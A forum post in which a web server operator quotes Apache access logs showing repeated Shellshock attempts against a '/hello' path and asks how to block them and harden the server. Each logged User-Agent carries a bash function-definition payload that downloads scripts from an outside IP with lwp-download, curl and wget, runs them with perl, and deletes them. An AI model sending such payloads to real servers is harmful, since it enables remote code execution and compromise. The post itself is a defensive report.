My web server emails me if a 404 error occurs (to help me with missing links). I only had the usual 404's like http://www.example.com/administrator
and so on.
But lately I keep getting a request for http://www.example.com/hello
. I seem to get them from all over the world.
185.63.188.120 - - [21/Dec/2015:08:35:54 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:08:35:55 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:16:17:11 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:16:17:12 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
172.246.105.114 - - [22/Dec/2015:08:25:12 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
172.246.105.114 - - [22/Dec/2015:08:25:13 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
80.248.216.11 - - [22/Dec/2015:16:33:41 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/BASHSALAM;wget http://188.138.41.134/BASHSALAM -O /tmp/BASHSALAM;wget http://188.138.41.134/BASHSALAM;perl BASHSALAM;perl BASHSALAM;rm -rf /tmp/BASHSALAM*\""
80.248.216.11 - - [22/Dec/2015:16:33:42 -0500] "GET /hello HTTP/1.0" 403 1809 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/BASHSALAM;wget http://188.138.41.134/BASHSALAM -O /tmp/BASHSALAM;wget http://188.138.41.134/BASHSALAM;perl BASHSALAM;perl BASHSALAM;rm -rf /tmp/BASHSALAM*\""
185.63.188.120 - - [22/Dec/2015:22:12:45 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [22/Dec/2015:22:12:46 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [23/Dec/2015:16:56:56 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/iod.exe;curl -O http://188.138.41.134/iod.exe;wget http://188.138.41.134/iod.exe;perl /tmp/iod.exe*;perl iod.exe;rm -rf /tmp/iod.exe*\""
185.63.188.120 - - [23/Dec/2015:16:56:57 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/iod.exe;curl -O http://188.138.41.134/iod.exe;wget http://188.138.41.134/iod.exe;perl /tmp/iod.exe*;perl iod.exe;rm -rf /tmp/iod.exe*\""
I realize that this is a shellshock attack attempt on my server (server is patched).
My questions are: how do I block these kinds of attacks? Other than patching bash, is there something else I should do to harden my webserver? Is anyone else seeing these in their Apache logs?
What I found so incredibly sneaky on the attackers part, is that using "hello" in their URL makes it really hard to Google for answers. You will get a ton of useless results.